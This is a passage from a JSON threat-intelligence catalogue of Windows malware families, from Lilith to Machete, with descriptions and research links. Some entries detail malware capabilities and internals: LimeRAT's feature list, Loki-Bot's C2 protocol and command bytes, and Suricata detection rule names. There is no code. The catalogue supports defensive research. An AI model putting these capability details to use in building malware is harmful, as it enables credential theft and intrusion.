"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", "https://github.com/werkamsus/Lilith" ], "synonyms": [], "type": [] }, "uuid": "c443dc36-f439-46d8-8ce7-07d3532a412b", "value": "Lilith" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limedownloader", "https://github.com/NYAN-x-CAT/Lime-Downloader" ], "synonyms": [], "type": [] }, "uuid": "a70436b1-559d-48af-836f-f46074cd8ef3", "value": "limedownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limeminer", "https://github.com/NYAN-x-CAT/Lime-Miner" ], "synonyms": [], "type": [] }, "uuid": "3819bc21-8c15-48ee-8e68-ee2a0c5f82a7", "value": "limeminer" }, { "description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", "https://www.youtube.com/watch?v=x-g-ZLeX8GM", "https://github.com/NYAN-x-CAT/Lime-RAT/", "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", "https://blog.reversinglabs.com/blog/rats-in-the-library", "https://lab52.io/blog/apt-c-36-recent-activity-analysis/" ], "synonyms": [], "type": [] }, "uuid": "771dbe6a-3f01-4bd4-8edd-070b2eb9df66", "value": "LimeRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" ], "synonyms": [], "type": [] }, "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", "value": "Limitail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr", "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] }, "uuid": "9a66df8d-ce65-49d6-a648-c1a5ea58cbc2", "value": "LinseningSvr" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" ], "synonyms": [], "type": [] }, "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", "value": "Listrix" }, { "description": "According to CarbonBlack, LiteDuke is a third stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. \r\nESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke", "https://norfolkinfosec.com/looking-back-at-liteduke/", "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/" ], "synonyms": [], "type": [] }, "uuid": "ae7352bd-86e9-455d-bdc3-0567886a8392", "value": "LiteDuke" }, { "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", "https://github.com/zettabithf/LiteHTTP", "https://viriback.com/recent-litehttp-activities-and-iocs/", "https://malware.news/t/recent-litehttp-activities-and-iocs/21053" ], "synonyms": [], "type": [] }, "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", "value": "LiteHTTP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit", "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md", "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/", "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://id-ransomware.blogspot.com/search?q=lockbit", "https://blog.lexfo.fr/lockbit-malware.html", "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf", "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/" ], "synonyms": [ "ABCD Ransomware" ], "type": [] }, "uuid": "fd035735-1ab9-419d-a94c-d560612e970b", "value": "LockBit" }, { "description": "According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files but certain versions had little to no whitelist that would protect import system files such as the Windows Boot Manager.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga", "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf", "https://www.abuse.io/lockergoga.txt", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.youtube.com/watch?v=o6eEN0mUakM", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [], "type": [] }, "uuid": "a4a6469d-6753-4195-9635-f11d458525f9", "value": "LockerGoga" }, { "description": "Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", "https://dissectingmalwa.re/picking-locky.html", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/", "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/", "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://vixra.org/pdf/2002.0183v1.pdf", "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf" ], "synonyms": [], "type": [] }, "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", "value": "Locky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" ], "synonyms": [], "type": [] }, "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", "value": "Locky (Decryptor)" }, { "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" ], "synonyms": [], "type": [] }, "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", "value": "Locky Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" ], "synonyms": [], "type": [] }, "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", "value": "LockPOS" }, { "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html", "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html", "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" ], "synonyms": [ "LodaRAT", "Nymeria" ], "type": [] }, "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", "value": "Loda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo", "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html", "https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html", "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf", "https://twitter.com/jpcert_ac/status/1351355443730255872", "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf", "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html" ], "synonyms": [], "type": [] }, "uuid": "9429e1b3-31fb-4e52-ad78-e3d377f10fcb", "value": "LODEINFO" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", "value": "Logedrut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" ], "synonyms": [], "type": [] }, "uuid": "2789b246-d762-4d38-8cc8-302293e314da", "value": "LogPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax", "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.youtube.com/watch?v=VeoXT0nEcFU", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" ], "synonyms": [], "type": [] }, "uuid": "15228ae0-26f9-44d8-8d6e-87b0bd2d2aba", "value": "LoJax" }, { "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", "https://isc.sans.edu/diary/24372", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/", "https://github.com/R3MRUM/loki-parse", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/", "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://lab52.io/blog/a-twisted-malware-infection-chain/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html", "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files", "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/", "https://phishme.com/loki-bot-malware/", "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" ], "synonyms": [ "Loki", "LokiBot", "LokiPWS" ], "type": [] }, "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", "value": "Loki Password Stealer (PWS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif", "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63", "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062" ], "synonyms": [], "type": [] }, "uuid": "397bfb34-5643-4d21-a5b1-6950750fb89f", "value": "LOLSnif" }, { "description": "The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch", "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "synonyms": [], "type": [] }, "uuid": "08106bd2-975b-421c-8794-366452fb0109", "value": "LONGWATCH" }, { "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper", "https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool", "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/", "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/", "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html" ], "synonyms": [], "type": [] }, "uuid": "4b83ba50-7d50-48b4-bb70-fcbcacd23340", "value": "looChiper Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback", "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/", "https://nao-sec.org/2021/01/royal-road-redive.html", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals", "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks", "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" ], "synonyms": [], "type": [] }, "uuid": "bb038b04-622b-4df6-b867-601284e8da0e", "value": "Lookback" }, { "description": "L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. These include:\r\n\r\nDownload and execute\r\nUpdate\r\nOpen page (visible)\r\nOpen page (invisible)\r\nCmd\r\nKill process\r\nUpload file\r\nHTTP Flood\r\n\r\nL0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target's clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", "https://twitter.com/hexlax/status/1058356670835908610", "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py", "https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/", "https://www.bromium.com/decrypting-l0rdix-rats-c2/", "https://blog.ensilo.com/l0rdix-attack-tool" ], "synonyms": [ "lordix" ], "type": [] }, "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", "value": "L0rdix" }, { "description": "Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup", "https://twitter.com/Arkbird_SOLG/status/1295396936896438272", "https://twitter.com/r3c0nst/status/1295275546780327936" ], "synonyms": [], "type": [] }, "uuid": "8ab39736-68f4-4b51-9b48-7034da1cac71", "value": "Loup" }, { "description": "LOWBALL, uses the legitimate Dropbox cloud-storage\r\nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" ], "synonyms": [], "type": [] }, "uuid": "484b9fd9-76c6-41af-a85b-189b0fc94909", "value": "LOWBALL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey", "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/", "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html" ], "synonyms": [ "PortReuse" ], "type": [] }, "uuid": "515d1318-c3b1-4d40-a321-31b3baf75414", "value": "LOWKEY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lucifer", "https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/", "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/" ], "synonyms": [], "type": [] }, "uuid": "54093130-035f-4f2c-b98c-a660156fbbda", "value": "Lucifer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://www.secureworks.com/research/threat-profiles/copper-fieldstone" ], "synonyms": [ "LuminosityLink" ], "type": [] }, "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", "value": "Luminosity RAT" }, { "description": " An uploader that can exfiltrate files to Dropbox.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney", "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "https://twitter.com/MrDanPerez/status/1097881406661902337" ], "synonyms": [], "type": [] }, "uuid": "fb0167e5-3457-46ec-a6d1-b8e4ad9bc89b", "value": "LunchMoney" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" ], "synonyms": [], "type": [] }, "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", "value": "Lurk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" ], "synonyms": [], "type": [] }, "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", "value": "Luzo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" ], "synonyms": [ "Adneukine", "Bomba Locker", "Lucky Locker" ], "type": [] }, "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", "value": "Lyposit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.m00nd3v", "https://www.zscaler.com/blogs/research/deep-dive-m00nd3v-logger" ], "synonyms": [], "type": [] }, "uuid": "737a73d5-40a2-4779-a84b-bdbefd1af4c9", "value": "M00nD3V Logger" }, { "description": "According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted 